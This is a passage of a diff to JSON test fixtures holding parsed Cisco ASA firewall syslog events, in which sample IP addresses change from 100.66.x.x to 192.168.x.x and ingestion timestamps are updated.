"event", "action": "firewall-rule", @@ -1930,7 +1930,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.6", + "mapped_source_ip": "192.168.252.6", "connection_id": "11759", "source_interface": "outside", "mapped_destination_port": 56132 @@ -1952,8 +1952,8 @@ }, "source": { "port": 53, - "address": "100.66.252.6", - "ip": "100.66.252.6" + "address": "192.168.252.6", + "ip": "192.168.252.6" }, "tags": [ "preserve_original_event" @@ -1988,7 +1988,7 @@ "localhost" ], "ip": [ - "100.66.252.6", + "192.168.252.6", "172.31.98.44" ] }, @@ -1998,8 +1998,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094792093Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", + "ingested": "2021-12-09T13:32:20.603874500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2031,8 +2031,8 @@ }, "destination": { "port": 8257, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1773, @@ -2072,7 +2072,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2080,8 +2080,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094793878Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257", + "ingested": "2021-12-09T13:32:20.603880300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2114,8 +2114,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2150,7 +2150,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2159,8 +2159,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094795609Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", + "ingested": "2021-12-09T13:32:20.603886100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2176,7 +2176,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11760", "source_interface": "outside", "mapped_destination_port": 1773 @@ -2193,8 +2193,8 @@ }, "destination": { "port": 8258, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1774, @@ -2234,7 +2234,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2242,8 +2242,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094797364Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258", + "ingested": "2021-12-09T13:32:20.603891900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2276,8 +2276,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2312,7 +2312,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2321,8 +2321,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094799118Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", + "ingested": "2021-12-09T13:32:20.603897800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2338,7 +2338,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11761", "source_interface": "outside", "mapped_destination_port": 1774 @@ -2360,8 +2360,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2396,7 +2396,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2405,8 +2405,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094800868Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.603903600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2422,7 +2422,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.238.126", + "mapped_source_ip": "192.168.238.126", "connection_id": "11762", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2444,8 +2444,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2480,7 +2480,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2489,8 +2489,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094802588Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.603909400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2506,7 +2506,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.93.51", + "mapped_source_ip": "192.168.93.51", "connection_id": "11763", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2528,8 +2528,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2564,7 +2564,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2574,8 +2574,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094804338Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", + "ingested": "2021-12-09T13:32:20.603915200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2612,8 +2612,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2648,7 +2648,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2658,8 +2658,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094806119Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", + "ingested": "2021-12-09T13:32:20.603921Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2691,8 +2691,8 @@ }, "destination": { "port": 8259, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1775, @@ -2732,7 +2732,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2740,8 +2740,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094807851Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259", + "ingested": "2021-12-09T13:32:20.603926900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2774,8 +2774,8 @@ }, "source": { "port": 443, - "address": "100.66.225.103", - "ip": "100.66.225.103" + "address": "192.168.225.103", + "ip": "192.168.225.103" }, "tags": [ "preserve_original_event" @@ -2810,7 +2810,7 @@ "localhost" ], "ip": [ - "100.66.225.103", + "192.168.225.103", "172.31.98.44" ] }, @@ -2819,8 +2819,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094809645Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", + "ingested": "2021-12-09T13:32:20.603932700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2836,7 +2836,7 @@ "destination_interface": "inside", "mapped_source_port": 443, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.225.103", + "mapped_source_ip": "192.168.225.103", "connection_id": "11764", "source_interface": "outside", "mapped_destination_port": 1775 @@ -2853,8 +2853,8 @@ }, "destination": { "port": 1189, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -2894,7 +2894,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2902,8 +2902,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094811539Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189", + "ingested": "2021-12-09T13:32:20.603941800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2936,8 +2936,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -2972,7 +2972,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -2981,8 +2981,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094815755Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.603946100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.240.126", + "mapped_source_ip": "192.168.240.126", "connection_id": "11772", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3020,8 +3020,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3056,7 +3056,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3065,8 +3065,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094817625Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.603953400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3082,7 +3082,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.44.45", + "mapped_source_ip": "192.168.44.45", "connection_id": "11773", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3104,8 +3104,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -3140,7 +3140,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -3150,8 +3150,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094819363Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", + "ingested": "2021-12-09T13:32:20.603958Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3188,8 +3188,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3224,7 +3224,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3234,8 +3234,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094821104Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", + "ingested": "2021-12-09T13:32:20.603963900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3267,8 +3267,8 @@ }, "destination": { "port": 8265, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1452, @@ -3308,7 +3308,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3316,8 +3316,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094822926Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265", + "ingested": "2021-12-09T13:32:20.603967700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3350,8 +3350,8 @@ }, "source": { "port": 80, - "address": "100.66.179.219", - "ip": "100.66.179.219" + "address": "192.168.179.219", + "ip": "192.168.179.219" }, "tags": [ "preserve_original_event" @@ -3386,7 +3386,7 @@ "localhost" ], "ip": [ - "100.66.179.219", + "192.168.179.219", "172.31.98.44" ] }, @@ -3395,8 +3395,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094824626Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", + "ingested": "2021-12-09T13:32:20.603972300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3412,7 +3412,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.219", + "mapped_source_ip": "192.168.179.219", "connection_id": "11774", "source_interface": "outside", "mapped_destination_port": 1452 @@ -3434,8 +3434,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3470,7 +3470,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3479,8 +3479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094826343Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.603978200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3496,7 +3496,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.157.232", + "mapped_source_ip": "192.168.157.232", "connection_id": "11775", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3518,8 +3518,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3554,7 +3554,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3563,8 +3563,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094828177Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.603983700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3580,7 +3580,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.178.133", + "mapped_source_ip": "192.168.178.133", "connection_id": "11776", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3602,8 +3602,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3638,7 +3638,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3648,8 +3648,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094829936Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", + "ingested": "2021-12-09T13:32:20.603987600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3686,8 +3686,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3722,7 +3722,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3732,8 +3732,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094831671Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", + "ingested": "2021-12-09T13:32:20.603991900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3765,8 +3765,8 @@ }, "destination": { "port": 8266, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1453, @@ -3806,7 +3806,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3814,8 +3814,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094833437Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266", + "ingested": "2021-12-09T13:32:20.603995400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3848,8 +3848,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3884,7 +3884,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3893,8 +3893,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094835210Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", + "ingested": "2021-12-09T13:32:20.603999900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3910,7 +3910,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.133.112", + "mapped_source_ip": "192.168.133.112", "connection_id": "11777", "source_interface": "outside", "mapped_destination_port": 1453 @@ -3932,8 +3932,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3968,7 +3968,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3979,8 +3979,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.094836936Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "ingested": "2021-12-09T13:32:20.604005800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4017,8 +4017,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4053,7 +4053,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4062,8 +4062,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094838659Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:32:20.604011600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4079,7 +4079,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.204.197", + "mapped_source_ip": "192.168.204.197", "connection_id": "11779", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4101,8 +4101,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -4137,7 +4137,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -4147,8 +4147,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094840380Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:32:20.604017500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4185,8 +4185,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4221,7 +4221,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4231,8 +4231,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-07-19T09:06:25.094842244Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown 